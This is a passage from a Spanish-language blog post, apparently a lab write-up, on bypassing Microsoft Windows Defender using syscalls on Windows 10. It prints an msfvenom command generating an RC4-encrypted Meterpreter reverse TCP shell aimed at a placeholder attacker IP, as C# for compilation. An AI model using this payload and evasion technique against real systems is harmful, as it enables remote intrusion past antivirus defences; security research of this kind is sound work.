Bypass Microsoft Windows Defender usando Syscall
![Imagen](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggOUzl4SL5IpJbq8b86RPiYNoTBhYH95206kRRvPuXcIsTfBrddmRFwLCCJkFuKJe8oJa-n7KmPc-OBH4A4I7ubGpSKVLV8IjB4OPBJkgmqdDDDMvQUR6wnfpa3EuRoZVU-F-FP-VcqyA/s320/descarga.jpg)
En mayo de este año, en una de mis investigaciones logré evadir los mecanismos de detección de Microsoft Windows Defender, con el objetivo de conocer y poner en práctica algunas técnicas utilizadas por atacantes en sus piezas de malware. Cuando se utilizan códigos propios, al no ser conocidas sus firmas y comportamientos, es más fácil lograr evadir las soluciones de seguridad, así que decidí utilizar algo conocido, que fuera detectado por la mayoría de antivirus, para así poder evidenciar realmente una evasión o bypass de la solución. Utilicé una shell reversa de meterpreter, generada por la herramienta msfvenom. vherrera@lab : /bypass/windefender # msfvenom --encrypt rc4 --encrypt-key S3cr3t -p windows/x64/meterpreter/reverse_tcp LHOST=[IP-Atacante] LPORT=443 -f csharp La prueba se realizó en un Windows 10 Professional x64 (1909) usando como lenguaje de programación C#, para aprovechar el compilador que viene incluido en el sistema operativo "csc.exe". En el comando m